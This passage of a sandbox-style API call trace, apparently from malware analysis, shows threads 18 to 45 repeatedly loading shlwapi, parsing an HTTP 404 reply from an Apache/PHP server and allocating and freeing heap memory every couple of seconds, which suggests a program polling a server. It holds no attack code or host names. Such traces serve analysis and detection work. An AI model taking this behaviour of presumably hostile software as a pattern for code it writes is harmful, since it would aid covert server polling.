dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 18 os_tid = 0x10d4 [0164.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.081] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0164.081] GetProcessHeap () returned 0x5b0000 [0164.081] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0164.081] GetProcessHeap () returned 0x5b0000 [0164.081] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0164.081] GetProcessHeap () returned 0x5b0000 [0164.081] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 19 os_tid = 0x10b4 [0165.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.732] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:49 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0165.732] GetProcessHeap () returned 0x5b0000 [0165.732] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0165.732] GetProcessHeap () returned 0x5b0000 [0165.732] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0165.732] GetProcessHeap () returned 0x5b0000 [0165.732] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 20 os_tid = 0x7b0 [0167.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.530] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0167.530] GetProcessHeap () returned 0x5b0000 [0167.530] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0167.530] GetProcessHeap () returned 0x5b0000 [0167.530] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0167.530] GetProcessHeap () returned 0x5b0000 [0167.530] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 21 os_tid = 0x116c [0169.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.350] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0169.350] GetProcessHeap () returned 0x5b0000 [0169.350] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf338 [0169.350] GetProcessHeap () returned 0x5b0000 [0169.350] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf338 | out: hHeap=0x5b0000) returned 1 [0169.351] GetProcessHeap () returned 0x5b0000 [0169.351] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 22 os_tid = 0x1148 [0171.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.008] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:55 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0171.008] GetProcessHeap () returned 0x5b0000 [0171.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0171.008] GetProcessHeap () returned 0x5b0000 [0171.008] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0171.008] GetProcessHeap () returned 0x5b0000 [0171.008] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 23 os_tid = 0x1144 [0172.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.821] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:56 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0172.821] GetProcessHeap () returned 0x5b0000 [0172.821] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0172.821] GetProcessHeap () returned 0x5b0000 [0172.821] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0172.821] GetProcessHeap () returned 0x5b0000 [0172.821] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 24 os_tid = 0x864 [0174.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.406] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0174.406] GetProcessHeap () returned 0x5b0000 [0174.406] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0174.406] GetProcessHeap () returned 0x5b0000 [0174.406] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0174.406] GetProcessHeap () returned 0x5b0000 [0174.406] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 25 os_tid = 0x1184 [0176.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.004] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.004] GetProcessHeap () returned 0x5b0000 [0176.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0176.004] GetProcessHeap () returned 0x5b0000 [0176.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0176.005] GetProcessHeap () returned 0x5b0000 [0176.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 26 os_tid = 0x11a8 [0178.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.159] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.159] GetProcessHeap () returned 0x5b0000 [0178.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf338 [0178.159] GetProcessHeap () returned 0x5b0000 [0178.159] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf338 | out: hHeap=0x5b0000) returned 1 [0178.160] GetProcessHeap () returned 0x5b0000 [0178.160] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 27 os_tid = 0x11a0 [0180.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.073] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:04 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.074] GetProcessHeap () returned 0x5b0000 [0180.074] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0180.074] GetProcessHeap () returned 0x5b0000 [0180.074] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0180.074] GetProcessHeap () returned 0x5b0000 [0180.074] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 28 os_tid = 0x1198 [0181.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.814] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.814] GetProcessHeap () returned 0x5b0000 [0181.814] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0181.814] GetProcessHeap () returned 0x5b0000 [0181.814] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0181.814] GetProcessHeap () returned 0x5b0000 [0181.815] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 29 os_tid = 0x11e4 [0183.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.498] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.498] GetProcessHeap () returned 0x5b0000 [0183.498] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0183.498] GetProcessHeap () returned 0x5b0000 [0183.498] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0183.499] GetProcessHeap () returned 0x5b0000 [0183.499] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 30 os_tid = 0x11e8 [0185.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.204] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.204] GetProcessHeap () returned 0x5b0000 [0185.204] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0185.204] GetProcessHeap () returned 0x5b0000 [0185.204] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0185.204] GetProcessHeap () returned 0x5b0000 [0185.204] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 31 os_tid = 0x1120 [0186.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.805] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.805] GetProcessHeap () returned 0x5b0000 [0186.805] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0186.805] GetProcessHeap () returned 0x5b0000 [0186.805] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0186.805] GetProcessHeap () returned 0x5b0000 [0186.805] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 32 os_tid = 0xdf0 [0188.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.630] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.630] GetProcessHeap () returned 0x5b0000 [0188.630] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0188.630] GetProcessHeap () returned 0x5b0000 [0188.630] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0188.630] GetProcessHeap () returned 0x5b0000 [0188.631] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 33 os_tid = 0x111c [0190.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.222] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:14 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.222] GetProcessHeap () returned 0x5b0000 [0190.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0190.222] GetProcessHeap () returned 0x5b0000 [0190.222] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0190.222] GetProcessHeap () returned 0x5b0000 [0190.222] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 34 os_tid = 0x1118 [0191.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.831] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.831] GetProcessHeap () returned 0x5b0000 [0191.831] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0191.831] GetProcessHeap () returned 0x5b0000 [0191.831] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0191.831] GetProcessHeap () returned 0x5b0000 [0191.832] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 35 os_tid = 0x120c [0193.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.190] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:17 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.191] GetProcessHeap () returned 0x5b0000 [0193.191] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf338 [0193.191] GetProcessHeap () returned 0x5b0000 [0193.191] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf338 | out: hHeap=0x5b0000) returned 1 [0193.191] GetProcessHeap () returned 0x5b0000 [0193.191] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 36 os_tid = 0xdf4 [0194.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.401] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:18 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.401] GetProcessHeap () returned 0x5b0000 [0194.401] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0194.401] GetProcessHeap () returned 0x5b0000 [0194.401] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0194.401] GetProcessHeap () returned 0x5b0000 [0194.402] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 37 os_tid = 0xdec [0195.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0195.775] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:20 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.775] GetProcessHeap () returned 0x5b0000 [0195.775] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0195.775] GetProcessHeap () returned 0x5b0000 [0195.775] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0195.775] GetProcessHeap () returned 0x5b0000 [0195.775] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 38 os_tid = 0x2f4 [0197.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.095] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:21 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.095] GetProcessHeap () returned 0x5b0000 [0197.095] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0197.095] GetProcessHeap () returned 0x5b0000 [0197.095] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0197.095] GetProcessHeap () returned 0x5b0000 [0197.096] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 39 os_tid = 0x684 [0198.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.658] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.658] GetProcessHeap () returned 0x5b0000 [0198.658] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0198.658] GetProcessHeap () returned 0x5b0000 [0198.658] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0198.658] GetProcessHeap () returned 0x5b0000 [0198.659] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 40 os_tid = 0xafc [0200.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.490] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:24 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.490] GetProcessHeap () returned 0x5b0000 [0200.490] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0200.490] GetProcessHeap () returned 0x5b0000 [0200.490] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0200.490] GetProcessHeap () returned 0x5b0000 [0200.491] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 41 os_tid = 0x1180 [0202.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.161] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:26 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0202.161] GetProcessHeap () returned 0x5b0000 [0202.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0202.161] GetProcessHeap () returned 0x5b0000 [0202.161] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0202.161] GetProcessHeap () returned 0x5b0000 [0202.161] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 42 os_tid = 0x11ec [0204.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.004] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:27 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.004] GetProcessHeap () returned 0x5b0000 [0204.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf338 [0204.004] GetProcessHeap () returned 0x5b0000 [0204.004] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf338 | out: hHeap=0x5b0000) returned 1 [0204.004] GetProcessHeap () returned 0x5b0000 [0204.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 43 os_tid = 0x1270 [0205.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.771] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:29 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.771] GetProcessHeap () returned 0x5b0000 [0205.771] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0205.771] GetProcessHeap () returned 0x5b0000 [0205.771] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0205.771] GetProcessHeap () returned 0x5b0000 [0205.771] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 44 os_tid = 0x1240 [0207.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.444] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0207.445] GetProcessHeap () returned 0x5b0000 [0207.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0207.445] GetProcessHeap () returned 0x5b0000 [0207.445] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0207.445] GetProcessHeap () returned 0x5b0000 [0207.445] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 45 os_tid = 0x123c [0208.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.452] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.452] GetProcessHeap () returned 0x5b0000 [0208.452] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf338 [0208.452] GetProcessHeap () returned 0x5b0000 [0208.452] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf338 | out: hHeap=0x5b0000) returned 1 [0208.452] GetProcessHeap () returned 0x5b0000 [0208.452] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 